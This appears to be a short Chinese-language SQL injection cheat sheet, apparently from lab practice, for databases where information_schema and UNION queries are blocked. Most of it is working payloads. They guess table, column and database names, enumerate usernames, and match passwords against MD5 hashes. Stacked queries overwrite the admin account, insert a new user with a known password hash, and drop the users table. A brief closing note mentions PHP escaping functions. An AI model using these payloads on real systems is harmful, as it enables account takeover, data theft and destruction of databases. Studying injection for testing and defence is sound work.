SQL注入
无法读取information schema库
拒绝union、order by语句
猜列名:'and column is null--+
猜当前表名:'and table.user is null--+
猜库名: 'and .dbname.table.user is null--+
猜库里其他表: 'and (select count(*) from table)>0--+
列表对应关系:'and users.user is null--+
猜字段内容
'or user -'admin
'or user like '%a%
猜账号对应密码
'or user-'admin' and password='MD5值'
当前库可写(直接去修改密码,用一段新的MD5去替换旧的密文)
非交互模式下,可能无法多条语句执行
执行失败,数据库客户端问题
'; update users set user='yuanfh' where user='admin
'; INSERT INTO users (' user_id',' first_name',' last_name',' user','password','avatar') VALUES (‘35',‘fh',‘yuan',‘yfh','5f4dcc3b5aa765d61d8327deb882cf99','OK');--+
危险
'; DROP TABLE users; --
SQLi没有通用方法,原理,变通,各种特性
mysql_real_escape_string()
stripslashes() 删掉右斜线
php内置过滤函数 转义
php5弃用 php7删除代之以mysqli()、
